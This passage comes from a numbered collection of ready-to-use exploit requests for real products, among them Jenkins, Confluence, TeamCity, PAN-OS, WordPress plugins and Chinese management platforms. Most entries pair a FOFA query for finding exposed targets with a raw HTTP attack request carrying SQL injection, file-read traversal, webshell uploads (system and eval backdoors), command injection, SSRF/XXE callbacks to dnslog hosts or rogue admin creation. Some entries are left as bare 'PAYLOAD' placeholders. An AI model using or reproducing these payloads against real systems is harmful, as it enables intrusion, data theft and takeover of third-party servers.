Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: 替换为自己的
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "第一步获得的值",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


The uploaded file path is /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; the plaintext is sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the admin console directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

